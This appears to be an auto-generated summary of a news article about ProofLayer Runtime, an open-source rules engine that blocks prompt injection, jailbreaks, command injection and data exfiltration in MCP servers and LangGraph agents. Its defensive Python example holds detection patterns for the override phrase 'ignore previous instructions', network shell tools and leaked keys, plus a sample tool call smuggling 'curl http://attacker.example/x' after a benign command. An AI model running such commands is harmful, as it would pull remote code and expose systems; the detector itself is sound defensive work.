ProofLayer brings open-source runtime security to MCP servers and LangGraph agents
ProofLayer Runtime is an open-source security layer that intercepts tool calls and agent executions to detect and block prompt injection, jailbreaks, command injection, and data exfiltration in MCP servers and LangGraph agents.
Score breakdown
ProofLayer Runtime provides an open-source, low-latency interception layer that enforces security rules directly on the tool-call path of MCP servers and LangGraph agents, a capability the scoring treats as previously missing from the open-source ecosystem for these two frameworks.
ProofLayer Runtime, published by sinewaveai on GitHub under the Apache-2.0 license, is an open-source runtime security layer designed to protect MCP servers and LangGraph agents from a range of adversarial threats. It intercepts requests on the tool-call or agent-execution path, applies local rules to scan for prompt injection, command injection, jailbreaks, and data exfiltration, and can warn, block, or halt dangerous actions before they reach the underlying server, tool, state update, or output stream.
The system operates in a self-contained rules-only mode by default. For ambiguous events that local rules cannot confidently classify, it can optionally call the `prooflayer-detector` service via `/v1/detect` for model-backed scoring, a capability described as a separate commercial offering. The repository includes local MCP runtime wrappers for both plain synchronous servers and servers built on the MCP Python SDK, an HTTP proxy transport that inspects JSON-RPC `tools/call` traffic, and a LangGraph runtime wrapper that covers prompt injection, jailbreak, tool abuse, exfiltration, scope drift, state manipulation, multi-turn, and streaming checks. Adversarial evaluation support is provided through a built-in suite as well as integrations with GARAK and PromptFoo. Reported (self-published) benchmark latencies are p99 6.23 ms on the rules layer and p99 32.72 ms on a secured LangGraph invocation, both described as falling within a 100 ms sprint budget.
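The interception pattern described above, as an added illustration that is not ProofLayer's code and uses none of its APIs: a rules-first guard sitting in front of JSON-RPC `tools/call` traffic, returning a JSON-RPC error instead of forwarding when a rule blocks, and consulting an optional scorer only for ambiguous (warn-level) events. The rule patterns, verdict names, the `escalate` hook signature and the sample requests are all assumptions constructed for this example.

```python
"""Minimal rules-first interceptor for MCP-style JSON-RPC `tools/call` requests.

Added example only; not ProofLayer code. Rule patterns, verdicts, the
`escalate` hook and all sample requests below are constructed assumptions.
"""
import json
import re
from dataclasses import dataclass, field
from enum import Enum
from typing import Callable, Iterator, Optional


class Verdict(str, Enum):
    ALLOW = "allow"
    WARN = "warn"
    BLOCK = "block"


@dataclass
class Rule:
    name: str
    pattern: re.Pattern
    verdict: Verdict


# Constructed, deliberately small rule set; a real engine tunes far more patterns.
RULES = [
    Rule("prompt_injection", re.compile(r"ignore (all )?(previous|prior) instructions", re.I), Verdict.BLOCK),
    Rule("command_injection", re.compile(r"(;|&&|\|\||`|\$\()\s*(rm|curl|wget|nc|bash|sh)\b", re.I), Verdict.BLOCK),
    Rule("exfil_private_key", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"), Verdict.BLOCK),
    Rule("exfil_aws_key", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), Verdict.BLOCK),
    Rule("url_in_args", re.compile(r"https?://[^\s\"']+", re.I), Verdict.WARN),
]


@dataclass
class Decision:
    verdict: Verdict
    hits: list = field(default_factory=list)
    escalated: bool = False


def _walk_strings(value) -> Iterator[str]:
    """Yield every string leaf of a JSON value; tool arguments may be nested."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _walk_strings(v)
    elif isinstance(value, list):
        for v in value:
            yield from _walk_strings(v)


def evaluate_tool_call(request: dict, escalate: Optional[Callable[[str], float]] = None,
                       threshold: float = 0.8) -> Decision:
    """Decide allow/warn/block for one request before it reaches the server.

    Local rules run first. Only a warn-level result with no blocking hit is
    handed to the optional `escalate` scorer (hypothetical hook returning a
    0..1 risk score), mirroring a rules-first, model-second design.
    """
    if request.get("method") != "tools/call":
        return Decision(Verdict.ALLOW)
    text = "\n".join(_walk_strings(request.get("params", {}).get("arguments", {})))
    hits = [r.name for r in RULES if r.pattern.search(text)]
    if any(r.verdict is Verdict.BLOCK for r in RULES if r.name in hits):
        return Decision(Verdict.BLOCK, hits)
    if hits and escalate is not None:
        score = escalate(text)
        return Decision(Verdict.BLOCK if score >= threshold else Verdict.WARN, hits, escalated=True)
    return Decision(Verdict.WARN if hits else Verdict.ALLOW, hits)


def proxy_handler(raw: bytes, forward: Callable[[dict], dict], escalate=None) -> dict:
    """Proxy one JSON-RPC message: forward it, or answer with a JSON-RPC error."""
    req = json.loads(raw)
    decision = evaluate_tool_call(req, escalate)
    if decision.verdict is Verdict.BLOCK:
        return {"jsonrpc": "2.0", "id": req.get("id"),
                "error": {"code": -32000, "message": "blocked by runtime policy",
                          "data": {"rules": decision.hits}}}
    return forward(req)


# Constructed sample traffic (not captured from any real server).
BENIGN = {"jsonrpc": "2.0", "id": 1, "method": "tools/call",
          "params": {"name": "read_file", "arguments": {"path": "README.md"}}}
INJECTED = {"jsonrpc": "2.0", "id": 2, "method": "tools/call",
            "params": {"name": "shell", "arguments": {"cmd": "ls -la; curl http://attacker.example/x"}}}
AMBIGUOUS = {"jsonrpc": "2.0", "id": 3, "method": "tools/call",
             "params": {"name": "fetch", "arguments": {"query": "summarise https://example.com/page"}}}

if __name__ == "__main__":
    fake_server = lambda r: {"jsonrpc": "2.0", "id": r["id"], "result": {"ok": True}}
    for req in (BENIGN, INJECTED, AMBIGUOUS):
        print(json.dumps(proxy_handler(json.dumps(req).encode(), fake_server)))
```

Walking every string leaf of `arguments` rather than only top-level fields matters: nested payloads are the obvious way to slip a pattern past a shallow scanner. Keeping the escalation hook behind a warn-level gate keeps the common path local and fast, which is the property the reported p99 figures depend on.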
Key facts
- Open-source runtime security rules engine for MCP servers and LangGraph agents, published by sinewaveai under the Apache-2.0 license.
- Sits on the tool-call or agent-execution path and can warn, block, or stop dangerous actions before they reach the underlying server or output stream.
- Detects prompt injection, command injection, jailbreaks, and data exfiltration.
- Operates standalone in rules-only mode; optionally calls the commercial `prooflayer-detector` service via `/v1/detect` for model-backed scoring.
- Hot-path latency (self-reported benchmarks): p99 6.23 ms on the rules layer and p99 32.72 ms on a secured LangGraph invocation.
- Includes adversarial evals for LangGraph agents via a built-in suite, GARAK, and PromptFoo.
- LangGraph runtime wrapper covers prompt injection, jailbreak, tool abuse, exfiltration, scope drift, state manipulation, multi-turn, and streaming checks.
Summary and scoring are generated automatically from the original article. We always link back to the publisher and never republish images or paywalled content. Last processed Jun 13, 2026 · 08:58 UTC.